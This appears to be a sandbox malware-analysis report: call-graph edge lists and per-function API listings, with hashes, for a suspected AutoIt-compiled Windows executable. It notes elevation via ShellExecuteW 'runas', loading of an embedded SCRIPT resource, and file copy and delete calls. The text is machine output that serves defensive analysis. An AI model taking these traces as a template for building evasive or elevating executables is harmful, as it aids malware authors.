97373->97323 97373->97324 97374->97332 97375->97332 97376->97327 97377->97328 97378->97331 97379->97335 97380->97340 97381->97340 97382->97340 97383->97312 97384->97340 97386 c58e74 _wcslen 97385->97386 97387 c58f63 97386->97387 97388 c58ea9 97386->97388 97391 c58f68 97386->97391 97387->97348 97387->97354 97388->97387 97393 c0ce60 41 API calls 97388->97393 97391->97387 97394 c0ce60 41 API calls 97391->97394 97392->97353 97393->97388 97394->97391 97395->97369 97538 bf4e90 LoadLibraryA 97396->97538 97401 bf4ef6 LoadLibraryExW 97546 bf4e59 LoadLibraryA 97401->97546 97402 c33ccf 97404 bf4f39 68 API calls 97402->97404 97406 c33cd6 97404->97406 97408 bf4e59 3 API calls 97406->97408 97410 c33cde 97408->97410 97409 bf4f20 97409->97410 97411 bf4f2c 97409->97411 97568 bf50f5 97410->97568 97412 bf4f39 68 API calls 97411->97412 97415 bf4f31 97412->97415 97415->96919 97415->96922 97417 c33d05 97419 c5d7d8 97418->97419 97420 c5d7f3 97419->97420 97421 c5d7dd 97419->97421 97422 bfa961 22 API calls 97420->97422 97423 bfa8c7 22 API calls 97421->97423 97471 c5d7ee 97421->97471 97424 c5d7fb 97422->97424 97423->97471 97425 bfa961 22 API calls 97424->97425 97426 c5d803 97425->97426 97427 bfa961 22 API calls 97426->97427 97428 c5d80e 97427->97428 97429 bfa961 22 API calls 97428->97429 97430 c5d816 97429->97430 97431 bfa961 22 API calls 97430->97431 97432 c5d81e 97431->97432 97433 bfa961 22 API calls 97432->97433 97434 c5d826 97433->97434 97435 bfa961 22 API calls 97434->97435 97436 c5d82e 97435->97436 97437 bfa961 22 API calls 97436->97437 97438 c5d836 97437->97438 97439 bf525f 22 API calls 97438->97439 97440 c5d84d 97439->97440 97441 bf525f 22 API calls 97440->97441 97442 c5d866 97441->97442 97443 bf4c6d 22 API calls 97442->97443 97444 c5d872 97443->97444 97445 c5d885 97444->97445 97447 bf93b2 22 API calls 97444->97447 97446 bf4c6d 22 API calls 97445->97446 97448 c5d88e 97446->97448 97447->97445 97449 c5d89e 97448->97449 97450 bf93b2 22 API calls 97448->97450 97451 c5d8b0 97449->97451 
97452 bfa8c7 22 API calls 97449->97452 97450->97449 97453 bf6350 22 API calls 97451->97453 97452->97451 97454 c5d8bb 97453->97454 97801 c5d978 22 API calls 97454->97801 97456 c5d8ca 97802 c5d978 22 API calls 97456->97802 97458 c5d8dd 97459 bf4c6d 22 API calls 97458->97459 97460 c5d8e7 97459->97460 97461 c5d8ec 97460->97461 97462 c5d8fe 97460->97462 97463 bf33c6 22 API calls 97461->97463 97464 bf4c6d 22 API calls 97462->97464 97465 c5d8f9 97463->97465 97466 c5d907 97464->97466 97469 bf6350 22 API calls 97465->97469 97467 c5d925 97466->97467 97468 bf33c6 22 API calls 97466->97468 97470 bf6350 22 API calls 97467->97470 97468->97465 97469->97467 97470->97471 97471->96975 97473 c62954 __wsopen_s 97472->97473 97474 c0fe0b 22 API calls 97473->97474 97475 c62971 97474->97475 97476 bf5722 22 API calls 97475->97476 97477 c6297b 97476->97477 97803 c6274e 97477->97803 97479 c62986 97480 bf511f 64 API calls 97479->97480 97481 c6299b 97480->97481 97482 c629bf 97481->97482 97483 c62a6c 97481->97483 97832 c62e66 75 API calls 97482->97832 97835 c62e66 75 API calls 97483->97835 97486 c629c4 97521 c62a75 messages 97486->97521 97833 c1d583 26 API calls 97486->97833 97487 c62a38 97489 bf50f5 40 API calls 97487->97489 97487->97521 97490 c62a91 97489->97490 97491 bf50f5 40 API calls 97490->97491 97493 c62aa1 97491->97493 97492 c629ed 97834 c1d583 26 API calls 97492->97834 97494 bf50f5 40 API calls 97493->97494 97496 c62abc 97494->97496 97497 bf50f5 40 API calls 97496->97497 97498 c62acc 97497->97498 97499 bf50f5 40 API calls 97498->97499 97500 c62ae7 97499->97500 97501 bf50f5 40 API calls 97500->97501 97502 c62af7 97501->97502 97503 bf50f5 40 API calls 97502->97503 97504 c62b07 97503->97504 97505 bf50f5 40 API calls 97504->97505 97506 c62b17 97505->97506 97806 c63017 GetTempPathW GetTempFileNameW 97506->97806 97508 c62b22 97509 c1e5eb 29 API calls 97508->97509 97520 c62b33 97509->97520 97510 c62bed 97816 c1e678 97510->97816 97512 c62bf8 97514 c62c12 97512->97514 97515 c62bfe DeleteFileW 
97512->97515 97513 bf50f5 40 API calls 97513->97520 97516 c62c91 CopyFileW 97514->97516 97523 c62c18 97514->97523 97515->97521 97517 c62ca7 DeleteFileW 97516->97517 97518 c62cb9 DeleteFileW 97516->97518 97517->97521 97829 c62fd8 CreateFileW 97518->97829 97520->97510 97520->97513 97520->97521 97807 c1dbb3 97520->97807 97521->96981 97836 c622ce 97523->97836 97528 bf33dd 97527->97528 97529 c330bb 97527->97529 98113 bf33ee 97528->98113 97530 c0fddb 22 API calls 97529->97530 97533 c330c5 _wcslen 97530->97533 97532 bf33e8 97532->96934 97534 c0fe0b 22 API calls 97533->97534 97535 c330fe __fread_nolock 97534->97535 97536->96943 97537->96956 97539 bf4ea8 GetProcAddress 97538->97539 97540 bf4ec6 97538->97540 97541 bf4eb8 97539->97541 97543 c1e5eb 97540->97543 97541->97540 97542 bf4ebf FreeLibrary 97541->97542 97542->97540 97574 c1e52a 97543->97574 97545 bf4eea 97545->97401 97545->97402 97547 bf4e6e GetProcAddress 97546->97547 97548 bf4e8d 97546->97548 97549 bf4e7e 97547->97549 97551 bf4f80 97548->97551 97549->97548 97550 bf4e86 FreeLibrary 97549->97550 97550->97548 97552 c0fe0b 22 API calls 97551->97552 97553 bf4f95 97552->97553 97554 bf5722 22 API calls 97553->97554 97555 bf4fa1 __fread_nolock 97554->97555 97556 bf50a5 97555->97556 97557 c33d1d 97555->97557 97567 bf4fdc 97555->97567 97626 bf42a2 CreateStreamOnHGlobal 97556->97626 97637 c6304d 74 API calls 97557->97637 97560 c33d22 97562 bf511f 64 API calls 97560->97562 97561 bf50f5 40 API calls 97561->97567 97563 c33d45 97562->97563 97564 bf50f5 40 API calls 97563->97564 97566 bf506e messages 97564->97566 97566->97409 97567->97560 97567->97561 97567->97566 97632 bf511f 97567->97632 97569 c33d70 97568->97569 97570 bf5107 97568->97570 97659 c1e8c4 97570->97659 97573 c628fe 27 API calls 97573->97417 97576 c1e536 BuildCatchObjectHelperInternal 97574->97576 97575 c1e544 97599 c1f2d9 20 API calls _abort 97575->97599 97576->97575 97578 c1e574 97576->97578 97581 c1e586 97578->97581 97582 c1e579 97578->97582 97579 c1e549 97600 
c227ec 26 API calls pre_c_initialization 97579->97600 97591 c28061 97581->97591 97601 c1f2d9 20 API calls _abort 97582->97601 97585 c1e58f 97586 c1e595 97585->97586 97589 c1e5a2 97585->97589 97602 c1f2d9 20 API calls _abort 97586->97602 97587 c1e554 __wsopen_s 97587->97545 97603 c1e5d4 LeaveCriticalSection __fread_nolock 97589->97603 97592 c2806d BuildCatchObjectHelperInternal 97591->97592 97604 c22f5e EnterCriticalSection 97592->97604 97594 c2807b 97605 c280fb 97594->97605 97598 c280ac __wsopen_s 97598->97585 97599->97579 97600->97587 97601->97587 97602->97587 97603->97587 97604->97594 97612 c2811e 97605->97612 97606 c28177 97607 c24c7d _abort 20 API calls 97606->97607 97608 c28180 97607->97608 97610 c229c8 _free 20 API calls 97608->97610 97611 c28189 97610->97611 97617 c28088 97611->97617 97623 c23405 11 API calls 2 library calls 97611->97623 97612->97606 97612->97612 97612->97617 97621 c1918d EnterCriticalSection 97612->97621 97622 c191a1 LeaveCriticalSection 97612->97622 97614 c281a8 97624 c1918d EnterCriticalSection 97614->97624 97618 c280b7 97617->97618 97625 c22fa6 LeaveCriticalSection 97618->97625 97620 c280be 97620->97598 97621->97612 97622->97612 97623->97614 97624->97617 97625->97620 97627 bf42bc FindResourceExW 97626->97627 97631 bf42d9 97626->97631 97628 c335ba LoadResource 97627->97628 97627->97631 97629 c335cf SizeofResource 97628->97629 97628->97631 97630 c335e3 LockResource 97629->97630 97629->97631 97630->97631 97631->97567 97633 bf512e 97632->97633 97634 c33d90 97632->97634 97638 c1ece3 97633->97638 97637->97560 97641 c1eaaa 97638->97641 97640 bf513c 97640->97567 97645 c1eab6 BuildCatchObjectHelperInternal 97641->97645 97642 c1eac2 97654 c1f2d9 20 API calls _abort 97642->97654 97644 c1eae8 97656 c1918d EnterCriticalSection 97644->97656 97645->97642 97645->97644 97646 c1eac7 97655 c227ec 26 API calls pre_c_initialization 97646->97655 97649 c1eaf4 97657 c1ec0a 62 API calls 2 library calls 97649->97657 97651 c1eb08 97658 c1eb27 LeaveCriticalSection 
__fread_nolock 97651->97658 97653 c1ead2 __wsopen_s 97653->97640 97654->97646 97655->97653 97656->97649 97657->97651 97658->97653 97662 c1e8e1 97659->97662 97661 bf5118 97661->97573 97663 c1e8ed BuildCatchObjectHelperInternal 97662->97663 97664 c1e92d 97663->97664 97665 c1e925 __wsopen_s 97663->97665 97670 c1e900 ___scrt_fastfail 97663->97670 97675 c1918d EnterCriticalSection 97664->97675 97665->97661 97667 c1e937 97676 c1e6f8 97667->97676 97689 c1f2d9 20 API calls _abort 97670->97689 97671 c1e91a 97690 c227ec 26 API calls pre_c_initialization 97671->97690 97675->97667 97677 c1e727 97676->97677 97680 c1e70a ___scrt_fastfail 97676->97680 97691 c1e96c LeaveCriticalSection __fread_nolock 97677->97691 97678 c1e717 97764 c1f2d9 20 API calls _abort 97678->97764 97680->97677 97680->97678 97682 c1e76a __fread_nolock 97680->97682 97682->97677 97685 c1e886 ___scrt_fastfail 97682->97685 97692 c1d955 97682->97692 97699 c28d45 97682->97699 97766 c1cf78 26 API calls 4 library calls 97682->97766 97767 c1f2d9 20 API calls _abort 97685->97767 97687 c1e71c 97765 c227ec 26 API calls pre_c_initialization 97687->97765 97689->97671 97690->97665 97691->97665 97693 c1d961 97692->97693 97694 c1d976 97692->97694 97768 c1f2d9 20 API calls _abort 97693->97768 97694->97682 97696 c1d966 97769 c227ec 26 API calls pre_c_initialization 97696->97769 97698 c1d971 97698->97682 97700 c28d57 97699->97700 97701 c28d6f 97699->97701 97779 c1f2c6 20 API calls _abort 97700->97779 97703 c290d9 97701->97703 97712 c28db4 97701->97712 97795 c1f2c6 20 API calls _abort 97703->97795 97704 c28d5c 97780 c1f2d9 20 API calls _abort 97704->97780 97707 c290de 97796 c1f2d9 20 API calls _abort 97707->97796 97708 c28dbf 97781 c1f2c6 20 API calls _abort 97708->97781 97709 c28d64 97709->97682 97712->97708 97712->97709 97717 c28def 97712->97717 97713 c28dcc 97797 c227ec 26 API calls pre_c_initialization 97713->97797 97714 c28dc4 97782 c1f2d9 20 API calls _abort 97714->97782 97718 c28e08 97717->97718 97719 c28e4a 97717->97719 
97720 c28e2e 97717->97720 97718->97720 97726 c28e15 97718->97726 97786 c23820 21 API calls 2 library calls 97719->97786 97783 c1f2c6 20 API calls _abort 97720->97783 97722 c28e33 97784 c1f2d9 20 API calls _abort 97722->97784 97770 c2f89b 97726->97770 97727 c28e61 97730 c229c8 _free 20 API calls 97727->97730 97728 c28e3a 97785 c227ec 26 API calls pre_c_initialization 97728->97785 97729 c28fb3 97732 c29029 97729->97732 97735 c28fcc GetConsoleMode 97729->97735 97733 c28e6a 97730->97733 97734 c2902d ReadFile 97732->97734 97736 c229c8 _free 20 API calls 97733->97736 97737 c290a1 GetLastError 97734->97737 97738 c29047 97734->97738 97735->97732 97739 c28fdd 97735->97739 97740 c28e71 97736->97740 97741 c29005 97737->97741 97742 c290ae 97737->97742 97738->97737 97743 c2901e 97738->97743 97739->97734 97744 c28fe3 ReadConsoleW 97739->97744 97745 c28e96 97740->97745 97746 c28e7b 97740->97746 97762 c28e45 __fread_nolock 97741->97762 97790 c1f2a3 20 API calls 2 library calls 97741->97790 97793 c1f2d9 20 API calls _abort 97742->97793 97757 c29083 97743->97757 97758 c2906c 97743->97758 97743->97762 97744->97743 97750 c28fff GetLastError 97744->97750 97789 c29424 28 API calls __wsopen_s 97745->97789 97787 c1f2d9 20 API calls _abort 97746->97787 97750->97741 97751 c229c8 _free 20 API calls 97751->97709 97752 c28e80 97788 c1f2c6 20 API calls _abort 97752->97788 97753 c290b3 97794 c1f2c6 20 API calls _abort 97753->97794 97760 c2909a 97757->97760 97757->97762 97791 c28a61 31 API calls 4 library calls 97758->97791 97792 c288a1 29 API calls __wsopen_s 97760->97792 97762->97751 97763 c2909f 97763->97762 97764->97687 97765->97677 97766->97682 97767->97687 97768->97696 97769->97698 97771 c2f8b5 97770->97771 97772 c2f8a8 97770->97772 97774 c2f8c1 97771->97774 97799 c1f2d9 20 API calls _abort 97771->97799 97798 c1f2d9 20 API calls _abort 97772->97798 97774->97729 97776 c2f8ad 97776->97729 97777 c2f8e2 97800 c227ec 26 API calls pre_c_initialization 97777->97800 97779->97704 97780->97709 
97781->97714 97782->97713 97783->97722 97784->97728 97785->97762 97786->97727 97787->97752 97788->97762 97789->97726 97790->97762 97791->97762 97792->97763 97793->97753 97794->97762 97795->97707 97796->97713 97797->97709 97798->97776 97799->97777 97800->97776 97801->97456 97802->97458 97865 c1e4e8 97803->97865 97805 c6275d 97805->97479 97806->97508 97808 c1dbc1 97807->97808 97809 c1dbdd 97807->97809 97808->97809 97810 c1dbe3 97808->97810 97811 c1dbcd 97808->97811 97809->97520 97879 c1d9cc 97810->97879 97882 c1f2d9 20 API calls _abort 97811->97882 97814 c1dbd2 97883 c227ec 26 API calls pre_c_initialization 97814->97883 97817 c1e684 BuildCatchObjectHelperInternal 97816->97817 97818 c1e695 97817->97818 97819 c1e6aa 97817->97819 98035 c1f2d9 20 API calls _abort 97818->98035 97827 c1e6a5 __wsopen_s 97819->97827 98018 c1918d EnterCriticalSection 97819->98018 97821 c1e69a 98036 c227ec 26 API calls pre_c_initialization 97821->98036 97824 c1e6c6 98019 c1e602 97824->98019 97826 c1e6d1 98037 c1e6ee LeaveCriticalSection __fread_nolock 97826->98037 97827->97512 97830 c63013 97829->97830 97831 c62fff SetFileTime CloseHandle 97829->97831 97830->97521 97831->97830 97832->97486 97833->97492 97834->97487 97835->97487 97837 c622e7 97836->97837 97838 c622d9 97836->97838 97868 c1e469 97865->97868 97867 c1e505 97867->97805 97869 c1e478 97868->97869 97870 c1e48c 97868->97870 97876 c1f2d9 20 API calls _abort 97869->97876 97875 c1e488 __alldvrm 97870->97875 97878 c2333f 11 API calls 2 library calls 97870->97878 97873 c1e47d 97877 c227ec 26 API calls pre_c_initialization 97873->97877 97875->97867 97876->97873 97877->97875 97878->97875 97884 c1d97b 97879->97884 97882->97814 97883->97809 97885 c1d987 BuildCatchObjectHelperInternal 97884->97885 97892 c1918d EnterCriticalSection 97885->97892 97887 c1d995 97893 c1d9f4 97887->97893 97892->97887 97901 c249a1 97893->97901 98018->97824 98020 c1e624 98019->98020 98021 c1e60f 98019->98021 98024 c1dc0b 62 API calls 98020->98024 98027 c1e61f 
[Call-graph residue: the remainder of a node-adjacency edge list (node->node, with API-call annotations) from a rendered call graph; the rendering is not recoverable as text. Windows APIs named on the surviving edges: ReadFile, SetFilePointerEx, CharUpperBuffW, PeekMessageW, GetInputState, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, timeGetTime, Sleep, IsDialogMessageW, GetClassLongW, GetExitCodeProcess, WaitForSingleObject, CloseHandle, GetForegroundWindow, QueryPerformanceCounter, QueryPerformanceFrequency, EnterCriticalSection, LeaveCriticalSection, SetEvent, ResetEvent, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetFullPathNameW, GetModuleFileNameW, ShellExecuteW, SetCurrentDirectoryW, Shell_NotifyIconW, CreateWindowExW, ShowWindow, DestroyIcon, LoadStringW, GetVersionExW, GetCurrentProcess, IsWow64Process, LoadLibraryA, GetProcAddress, GetNativeSystemInfo, FreeLibrary, GetSystemInfo, PostQuitMessage, DefWindowProcW, SetTimer, RegisterWindowMessageW, CreatePopupMenu, KillTimer, MoveWindow, SetFocus, DeleteObject, DestroyWindow, SystemParametersInfoW, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetModuleHandleW, GetStdHandle, GetFileType, TerminateProcess, GetStartupInfoW, OleInitialize, InitializeCriticalSectionAndSpinCount, InterlockedExchange, DuplicateHandle, CreateThread, GetOpenFileNameW, GetLongPathNameW. CRT symbols annotated on the edges: _wcslen, __fread_nolock, __wsopen_s, _abort, pre_c_initialization, __onexit, __Init_thread_wait, ___scrt_fastfail, BuildCatchObjectHelperInternal, ___std_exception_copy, _ValidateLocalCookies; one edge is labelled GetPEB.]

                                        Control-flow Graph

                                        [Control-flow graph for the function at 00BF42DE, given as a basic-block adjacency list with blocks marked Executed or Not Executed; the graph rendering is not recoverable as text. The blocks call the internal routines bfa961, bf6b57, bf93b2 and bf37a0 and the Windows APIs GetVersionExW, GetCurrentProcess, IsWow64Process, LoadLibraryA, GetProcAddress, GetNativeSystemInfo, FreeLibrary and GetSystemInfo, as itemised under APIs below.]
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 00BF430D
                                          • Part of subcall function 00BF6B57: _wcslen.LIBCMT ref: 00BF6B6A
                                        • GetCurrentProcess.KERNEL32(?,00C8CB64,00000000,?,?), ref: 00BF4422
                                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 00BF4429
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00BF4454
                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00BF4466
                                        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00BF4474
                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00BF447B
                                        • GetSystemInfo.KERNEL32(?,?,?), ref: 00BF44A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                        • API String ID: 3290436268-3101561225
                                        • Opcode ID: ebb55a0ff357ae16b54a27738759c2583b2225a1ae51d599ea3c9b82987e953e
                                        • Instruction ID: 05f0947f3f8affe265196a1c76b486d7a41a36274e1664b403a0d1b641533710
                                        • Opcode Fuzzy Hash: ebb55a0ff357ae16b54a27738759c2583b2225a1ae51d599ea3c9b82987e953e
                                        • Instruction Fuzzy Hash: 48A1A075D2A2C4CFC712D76AFC85BAD3EE46B67308B0C55E9E841A3B33D6204648CB25

                                        Control-flow Graph

                                        control_flow_graph 637 bf42a2-bf42ba CreateStreamOnHGlobal 638 bf42bc-bf42d3 FindResourceExW 637->638 639 bf42da-bf42dd 637->639 640 bf42d9 638->640 641 c335ba-c335c9 LoadResource 638->641 640->639 641->640 642 c335cf-c335dd SizeofResource 641->642 642->640 643 c335e3-c335ee LockResource 642->643 643->640 644 c335f4-c335fc 643->644 645 c33600-c33612 644->645 645->640
                                        APIs
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00BF50AA,?,?,00000000,00000000), ref: 00BF42B2
                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00BF50AA,?,?,00000000,00000000), ref: 00BF42C9
                                        • LoadResource.KERNEL32(?,00000000,?,?,00BF50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BF4F20), ref: 00C335BE
                                        • SizeofResource.KERNEL32(?,00000000,?,?,00BF50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BF4F20), ref: 00C335D3
                                        • LockResource.KERNEL32(00BF50AA,?,?,00BF50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BF4F20,?), ref: 00C335E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                        • String ID: SCRIPT
                                        • API String ID: 3051347437-3967369404
                                        • Opcode ID: b5da55b407fe8571634e629130acafbceab7beb6046e41ffa0fabd5bf75b7abd
                                        • Instruction ID: 96a2af4f9af52f1d7bd9ec0b84a79638bb040f0d74332093b6f20099e7ef94ac
                                        • Opcode Fuzzy Hash: b5da55b407fe8571634e629130acafbceab7beb6046e41ffa0fabd5bf75b7abd
                                        • Instruction Fuzzy Hash: 46117C70200704BFDB258B65DC88F2B7BB9EBC5B51F1081A9B512976A0DB71DC088730

                                        Control-flow Graph

                                        APIs
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00BF2B6B
                                          • Part of subcall function 00BF3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00CC1418,?,00BF2E7F,?,?,?,00000000), ref: 00BF3A78
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                        • GetForegroundWindow.USER32(runas,?,?,?,?,?,00CB2224), ref: 00C32C10
                                        • ShellExecuteW.SHELL32(00000000,?,?,00CB2224), ref: 00C32C17
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                        • String ID: runas
                                        • API String ID: 448630720-4000483414
                                        • Opcode ID: e0511bc17311fb1f459ca6c851c92a4d33289dded36af758532abad7f45c2c22
                                        • Instruction ID: 1b802f36cf102e2e98a924b4ee7a621ef4d4134894920b16ca5b215ab95e0c79
                                        • Opcode Fuzzy Hash: e0511bc17311fb1f459ca6c851c92a4d33289dded36af758532abad7f45c2c22
                                        • Instruction Fuzzy Hash: 0611A2311083496ACB15FF60D892FBEB7E4DB91751F4814ADF742530A3CF218A4E8712
                                        APIs
                                        • lstrlenW.KERNEL32(?,00C35222), ref: 00C5DBCE
                                        • GetFileAttributesW.KERNELBASE(?), ref: 00C5DBDD
                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00C5DBEE
                                        • FindClose.KERNEL32(00000000), ref: 00C5DBFA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: FileFind$AttributesCloseFirstlstrlen
                                        • String ID:
                                        • API String ID: 2695905019-0
                                        • Opcode ID: 9fe7eaba14d7faa6299e1552e26a131ddb56ead0979b3eebf73226abf3f9d3c4
                                        • Instruction ID: 4a124f0e6c463a962353ef0947c314a74002b1599d71cdd4711647cb2e681aef
                                        • Opcode Fuzzy Hash: 9fe7eaba14d7faa6299e1552e26a131ddb56ead0979b3eebf73226abf3f9d3c4
                                        • Instruction Fuzzy Hash: 9BF0A7304106105783306B78AC4D66E376C9E01335B104702F836C10F0EBB0699886AD
                                        APIs
                                        • GetInputState.USER32 ref: 00BFD807
                                        • timeGetTime.WINMM ref: 00BFDA07
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BFDB28
                                        • TranslateMessage.USER32(?), ref: 00BFDB7B
                                        • DispatchMessageW.USER32(?), ref: 00BFDB89
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BFDB9F
                                        • Sleep.KERNEL32(0000000A), ref: 00BFDBB1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                        • String ID:
                                        • API String ID: 2189390790-0
                                        • Opcode ID: 8af8fc2e89c131e6f01024b011d3e1cf65938a8ffb87cd6c009f0e291f332175
                                        • Instruction ID: 6467d3875c7c8b9ecdd60d8f4787a54b423535427666bc3705eb5c14f7605e34
                                        • Opcode Fuzzy Hash: 8af8fc2e89c131e6f01024b011d3e1cf65938a8ffb87cd6c009f0e291f332175
                                        • Instruction Fuzzy Hash: 0242E130608346DFD724CF24C885B7ABBE2FF45304F548699FAA587291D770E988DB92

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00BF2D07
                                        • RegisterClassExW.USER32(00000030), ref: 00BF2D31
                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BF2D42
                                        • InitCommonControlsEx.COMCTL32(?), ref: 00BF2D5F
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BF2D6F
                                        • LoadIconW.USER32(000000A9), ref: 00BF2D85
                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BF2D94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                        • API String ID: 2914291525-1005189915
                                        • Opcode ID: c4b9507fde8ff666beb8b9ea42f8bef3dd20a9be22e4d0865d5fdb35d3701c4f
                                        • Instruction ID: bbd10243a51149b34668822ef4f549c41a4804d60f251bc75b93f63fa23731f1
                                        • Opcode Fuzzy Hash: c4b9507fde8ff666beb8b9ea42f8bef3dd20a9be22e4d0865d5fdb35d3701c4f
                                        • Instruction Fuzzy Hash: D121F2B1901318AFDB00DFA5EC89BDDBBB4FB09704F04811AFA11A62A0D7B14540CFA5

                                        Control-flow Graph

